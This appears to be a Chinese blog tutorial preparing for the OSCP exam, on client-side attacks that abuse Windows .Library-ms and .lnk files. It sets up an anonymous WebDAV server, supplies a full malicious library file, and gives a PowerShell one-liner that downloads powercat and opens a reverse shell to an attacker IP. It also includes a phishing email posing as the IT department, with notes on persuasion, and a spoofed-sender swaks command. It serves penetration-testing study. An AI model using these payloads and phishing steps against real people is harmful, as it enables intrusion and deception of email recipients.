OSCP：滥用Windows库文件执行客户端攻击_windows command put config.library-ms-CSDN博客

本文链接：https://blog.csdn.net/2301_79518550/article/details/145393247

在OSCP考试中，客户端攻击技术往往被视为一门深奥且复杂的艺术。本文将深入剖析一种基于Windows库文件（.Library-ms）和快捷方式文件（.lnk）的攻击手法，结合WebDAV服务、社会工程策略以及详细的攻击流程，全面展示其实现原理、技术细节及潜在风险。

一、背景与技术原理

1.1 Windows库文件的特性

Windows操作系统中的“库”（Libraries）功能自Windows 7引入，旨在方便用户管理文件和文件夹。.Library-ms文件是一种XML格式的配置文件，用于定义库的属性，例如名称、图标以及关联的文件夹路径。通过修改.Library-ms文件中的<url>字段，攻击者可以将其指向外部服务器（如WebDAV服务器），诱导目标系统在用户打开文件时发起网络请求。

这种机制的滥用源于Windows对外部资源访问的信任机制。当用户双击打开一个.Library-ms文件时，操作系统会尝试解析并加载指定的资源路径。如果该路径指向攻击者控制的服务器，目标系统可能在无感知的情况下执行恶意操作。

1.2 快捷方式文件的潜在威胁

快捷方式文件（.lnk）是Windows系统中常见的文件类型，用于指向其他文件或程序。通过修改.lnk文件的属性，攻击者可以在其执行时触发特定的命令行操作，例如运行PowerShell脚本。这种特性使得.lnk文件成为客户端攻击中的理想载体，尤其是在结合社会工程手段分发时。

1.3 WebDAV的作用

WebDAV（Web-based Distributed Authoring and Versioning）是一种基于HTTP的协议，允许用户通过网络访问和管理远程文件系统。在本次攻击中，WebDAV服务器被用作恶意文件的托管平台。攻击者通过配置匿名访问，确保目标用户无需认证即可连接，从而降低技术门槛并提高攻击成功率。

二、攻击准备阶段

成功的攻击离不开充分的准备工作。攻击者需要搭建WebDAV服务器、创建恶意文件并设计分发策略。以下是详细的步骤。

2.1 搭建WebDAV服务器

2.1.1 安装WebDAV服务

在Kali Linux环境中，wsgidav是一个轻量且易用的WebDAV服务器工具。通过以下命令即可完成安装：

pip3 install wsgidav

此命令通过Python的包管理工具pip下载并配置wsgidav，为后续服务部署奠定基础。

2.1.2 创建文件目录

为了托管恶意文件，攻击者需在本地创建一个目录并进行测试：

mkdir /home/kali/webdav
touch /home/kali/webdav/test.txt

创建test.txt文件的主要目的是验证目录权限和后续服务的可访问性。完成后，可删除该文件以避免干扰。

2.1.3 启动WebDAV服务

在目录准备就绪后，启动WebDAV服务器并配置关键参数：

/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

--host=0.0.0.0：监听所有网络接口，确保外部设备可访问。
--port=80：使用HTTP默认端口，降低目标防火墙拦截的可能性。
--auth=anonymous：启用匿名访问，方便目标连接。
--root /home/kali/webdav/：指定文件根目录。

启动后，WebDAV服务器将在80端口运行，等待目标用户的连接。

2.2 制作恶意文件

攻击的核心在于构造能够诱导目标执行恶意代码的文件。以下是两种关键文件的创建过程。

2.2.1 创建`config.Library-ms`文件

.Library-ms文件是攻击的入口，其内容如下：

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.119.2</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

<name>：引用系统DLL中的字符串，伪装成合法库名称。
<iconReference>：指定图标，增强文件可信度。
<url>：指向攻击者控制的WebDAV服务器地址（需替换为实际IP）。

当用户打开此文件时，Windows会尝试连接指定的URL，从而触发后续攻击。

2.2.2 创建`automatic_configuration.lnk`文件

快捷方式文件用于执行恶意PowerShell命令：

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1'); powercat -c 192.168.119.3 -p 4444 -e powershell"

IEX：调用Invoke-Expression，执行下载的脚本。
DownloadString：从指定URL下载powercat.ps1（需提前托管在另一服务器）。
powercat：反弹Shell工具，连接攻击者IP（192.168.119.3）的4444端口。

此命令隐蔽性强，目标用户难以察觉其真实意图。

2.3 文件托管与分发

将上述文件放入WebDAV目录后，可通过多种方式分发：

2.3.1 通过SMB共享上传

若目标位于同一内网，可使用SMB协议上传：

cd /home/kali/webdav
smbclient //192.168.50.195/share -c 'put config.Library-ms'

2.3.2 通过邮件附件发送

结合钓鱼邮件，将文件作为附件发送给目标用户（详见后续社会工程部分）。

三、攻击执行阶段

3.1 社会工程策略：钓鱼邮件设计

社会工程是攻击成功的关键。以下是一个精心设计的钓鱼邮件示例：

Subject: Staging Script 更新通知

尊敬的同事：

我在检查WEBSRV1时发现，之前使用的staging脚本仍存在于Git日志中。为确保安全性，我已将其删除。

另外，请在您的终端上安装最新的安全功能。为此，请下载附件中的文件，双击打开后执行其中的配置快捷方式。

感谢配合！  
John  
IT部门

可信性：提及“Git日志”等内部细节，增加真实感。
紧迫性：强调安全性，促使目标立即行动。
简洁性：避免冗长内容，降低怀疑。

3.2 发送钓鱼邮件

使用swaks工具发送邮件：

sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script 更新通知" --suppress-data -ap